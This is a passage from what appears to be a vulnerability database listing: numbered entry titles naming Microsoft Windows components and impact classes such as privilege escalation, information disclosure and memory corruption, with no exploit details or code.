escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 